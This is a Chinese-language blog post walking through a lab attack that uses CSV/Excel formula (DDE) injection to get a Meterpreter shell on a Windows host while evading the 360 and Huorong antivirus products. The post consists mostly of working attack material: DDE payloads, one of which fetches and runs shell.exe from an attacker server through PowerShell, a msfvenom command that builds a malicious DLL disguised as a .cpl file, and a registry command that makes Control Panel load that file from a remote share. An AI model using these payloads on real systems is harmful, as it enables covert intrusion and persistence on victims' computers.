CSV注入绕过杀软获取meterpreter

Writing
创建时间:
阅读:
  1. 前言
  2. CSV注入
    1. 说明
    2. 例子
    3. xls反弹meterpreter

前言

在学习CSV注入的时候,有个想法就是能不能执行恶意xls绕过有杀软主机返回meterpreter

CSV注入

说明

CSV又称xls注入或excel注入,通过在excel表里面进行操作调用其他进程

例子

@SUM(1+1)*cmd|' /C calc'!A0
=cmd|' /C notepad'!'A1'
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0

cmd为你要执行的查询可以换成别的,比如说将第一个变成

@SUM(1+1)*notepad|' demo.txt'!A0

当打开xls之后点击信任源就会执行

xls反弹meterpreter

环境:

windows server 2008 --- 192.168.241.129 开启了网络共享
kali --- 192.168.241.136
windows 7 --- 192.168.241.134 安有360服务

先做一个简单的测试:
kali生成一个简单的弹calc的dll,并将dll后缀名改为cpl

msfvenom -p windows/exec CMD=calc.exe -f dll > hook.dll
mv hook.dll hook.cpl

将这个hook.cpl移到windows server 2008的网络共享里

在windows7执行 (发现360并不拦截这个路径,火绒也试过)

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Cpls" /t REG_SZ /d "\\192.168.241.129\Public\hook.cpl"

此时打开控制面板会弹出calc

使用Procmon跟踪进程发现控制面板会寻找这个注册表路径并加载里面的cpl

远程加载之后我回去windows server 2008发现个事情
dll变成了这样,而且一删除就会重新出现= =。。后面问了Yansu才知道怎么回事
(PS:如果要删除,先删除目标加里的注册表路径,然后在共享的那台机里重启,重新进入系统后在访问共享删除)

实验结束,回到上一层话题,使用xls执行cmd命令添加这个注册表路径并执行控制面板获取meterpreter
流程大概是这样的:

生成dll改名为cpl

重新放入hook.cpl

msf开启监听

在xls插入以下语句

=cmd|' /C reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Cpls" /t REG_SZ /d "\\192.168.241.129\Public\hook.cpl"'!_xlbgnm.A1

打开控制面板触发

gif动图
Vd6ucj.gif

参考文章:
http://reverse-tcp.xyz/pentest/red%20team/2017/12/28/windows-to-download-and-execute-arbitrary-code.html
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CSV%20Injection

转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:CSV注入绕过杀软获取meterpreter

本文作者:九世

发布时间:2019-06-06, 21:32:48

最后更新:2019-06-06, 21:38:51

原始链接:http://jiushill.github.io/posts/ebb51b81.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

©2016-2019 Yelog

Built with Hexo and 3-hexo theme

目录